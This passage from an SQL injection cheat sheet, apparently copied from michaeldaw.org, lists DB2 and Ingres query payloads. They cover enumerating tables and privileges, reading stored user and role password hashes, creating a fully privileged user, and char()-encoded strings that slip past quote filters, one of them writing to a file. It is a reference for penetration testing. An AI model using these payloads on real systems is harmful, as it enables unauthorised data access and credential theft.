SQL Injection Cheat Sheet

Roles and passwords	N/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures	???
Create Users + Granting Privs	???
Time Delays	???
Execute OS Commands	???
Write to File System	???
Concatenation	SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
Casting	SELECT cast(’123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas	SELECT schemaname FROM syscat.schemata;

» Ingres

Payload	Description (if any)
Comments	Normal “–” and C-style /**/ comments are allowed: select 123; — sdfjsdlkfj select 123; /* sdfsdf */
Batching Queries Allowed?	Not via DBI in PERL.  Subsequent statements seem to get ignored: select blah from table where foo = 1; select … doesn’t matter this is ignored.
Database Version	select dbmsinfo(’_version’);
Current Database User	select dbmsinfo(’session_user’);
System User for Current Connection	select dbmsinfo(’system_user’);
Current Database	select dbmsinfo(’database’);
Limiting Rows Returned	select top 10 blah from table; select first 10 blah form table;
Returning N Rows starting at Offset M	Astoundingly, this doesn’t seem to be possible!
List Tables	select table_name, table_owner from iitables; select relid, relowner, relloc from iirelation; select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;
List Columns	select column_name, column_datatype, table_name, table_owner from iicolumns;
List Databse Users and Passwords	First connect to iidbdb, then: select name, password from iiuser;
FROM clause mandated in SELECTs?	No.  You don’t need to select form “dual” or anything.  The following is legal: select 1;
UNION supported	Yes.  Nothing tricky here.  The following is legal: select 1 union select 2;
Enumerate Tables Privs	select table_name, permit_user, permit_type from iiaccess;
Enumerate Current Privs	select dbmsinfo(’db_admin’); select dbmsinfo(’create_table’); select dbmsinfo(’create_procedure’); select dbmsinfo(’security_priv’); select dbmsinfo(’select_syscat’); select dbmsinfo(’db_privileges’); select dbmsinfo(’current_priv_mask’);
Length of a string	select length(’abc’); — returns 3
Bitwise AND	The function “bit_and” exists, but seems hard to use.  Here’s an example of ANDing 3 and 5 together.  The result is a “byte” type with value \001: select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
Substring	select substr(’abc’, 2, 1); — returns ‘b’
ASCII value of a character	??? (The “ascii” function exists, but doesn’t seem to do what I’d expect.)
Roles and passwords	First you need to connect to iidbdb, then: select roleid, rolepass from iirole;
List Database Procedures	First you need to connect to iidbdb, then: select dbp_name,  dbp_owner from iiprocedure;
Create Users + Granting Privs	First you need to connect to iidbdb, then: create user pm with password = ‘password’; grant all on current installation to pm;
Time Delays	???
Execute OS Commands	???
Write to File System	???
Concatenation	select ‘abc’ || ‘def’;
Casting	select cast(123 as varchar); select cast(’123′ as integer);

» Bypass SQL Injection Filters

Payload	Description (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39))	Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.
select * from login where user = char(39,97,39)	Using char() to bypass restrictions.

http://michaeldaw.org/sql-injection-cheat-sheet/